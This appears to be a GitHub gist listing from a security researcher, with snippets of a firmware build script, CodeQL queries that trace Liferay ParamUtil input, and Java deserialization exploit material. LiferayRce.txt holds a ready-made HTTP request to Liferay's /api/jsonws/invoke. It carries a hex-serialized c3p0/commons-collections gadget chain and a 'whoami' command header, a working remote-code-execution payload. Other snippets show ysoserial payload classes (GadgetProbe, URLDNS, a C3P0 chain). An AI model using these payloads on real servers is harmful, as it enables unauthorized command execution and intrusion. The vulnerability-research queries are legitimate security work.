testanull
testanull
/ Makefile.iot
Created
July 28, 2020 06:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export CONFIG_BCM_CPU_ARCH_NAME=mips32 | |
| export PROFILE=96838GWO | |
| dpkg --add-architecture i386 && apt update && apt install -y locales nano git make autoconf gcc g++ xxd libz-dev wget file gcc-multilib g++-multilib autoconf | |
| apt-get install libacl1-dev libuuid1:i386 uuid-dev uuid-dev:i386 zlib1g-dev zlib1g-dev:i386 liblzo2-dev liblzo2-dev:i386 pkg-config flex bison | |
| git clone https://github.com/weihutaisui/BCM/ | |
| find . -iname "*.pl" -exec chmod +x {} \; | |
| find . -iname "*.sh" -exec chmod +x {} \; | |
| find . -iname "configure" -exec chmod +x {} \; | |
| find . -iname "gen_dt_bindings" -exec chmod +x {} \; |
testanull
/ globaldataflow.ql
Created
July 16, 2020 02:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import semmle.code.java.dataflow.DataFlow | |
| class MyDataFlowConfiguration extends DataFlow::Configuration { | |
| MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" } | |
| override predicate isSource(DataFlow::Node source) { | |
| ... | |
| } | |
| override predicate isSink(DataFlow::Node sink) { |
testanull
/ isSource.ql
Created
May 27, 2020 02:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| override predicate isSource(DataFlow::Node source) { | |
| source.asExpr().(MethodAccess) instanceof LiferayParamUtilGetString | |
| } |
testanull
/ LiferayParamUtilGetString2.ql
Created
May 27, 2020 02:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class LiferayParamUtilGetString2 extends MethodAccess{ | |
| LiferayParamUtilGetString2(){ | |
| this.getMethod().hasName("getString") | |
| and this.getMethod().getDeclaringType().hasName("ParamUtil") | |
| } | |
| } |
testanull
/ LiferayParamUtilGetString.ql
Created
May 27, 2020 02:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class LiferayParamUtilGetString extends MethodAccess{ | |
| LiferayParamUtilGetString(){ | |
| exists(MethodAccess ma| | |
| ma.getMethod().hasName("getString") | |
| and ma.getMethod().getDeclaringType().hasName("ParamUtil") | |
| and this = ma | |
| ) | |
| } | |
| } |
testanull
/ LiferayRce.txt
Last active
December 18, 2023 03:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4912 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package ysoserial.payloads; | |
| import com.mchange.lang.ByteUtils; | |
| import org.apache.commons.collections.Transformer; | |
| import org.apache.commons.collections.functors.ChainedTransformer; | |
| import org.apache.commons.collections.functors.ConstantTransformer; | |
| import org.apache.commons.collections.functors.InvokerTransformer; | |
| import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
| import org.apache.commons.collections.map.LazyMap; | |
| import ysoserial.payloads.annotation.Authors; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public interface HandlerInterface{ | |
| public void doSmt(...); | |
| } | |
| public class HandlerImpl implements HandlerInterface{ | |
| public void doSmt(args){ | |
| //real Method | |
| sink(); | |
| } | |
| } |
testanull
/ GadgetProbe.java
Created
February 19, 2020 04:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package ysoserial.payloads; | |
| import javassist.CannotCompileException; | |
| import javassist.ClassPool; | |
| import javassist.CtClass; | |
| import ysoserial.payloads.util.PayloadRunner; | |
| import java.io.*; | |
| import java.lang.reflect.Array; |
testanull
/ URLDNS.java
Created
February 19, 2020 03:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public Object getObject(final String url) throws Exception { | |
| HashMap ht = new HashMap(); | |
| URL u = new URL(url); | |
| ht.put(u, url); // <=== | |
| Reflections.setFieldValue(u, "hashCode", -1); | |
| return ht; | |
| } |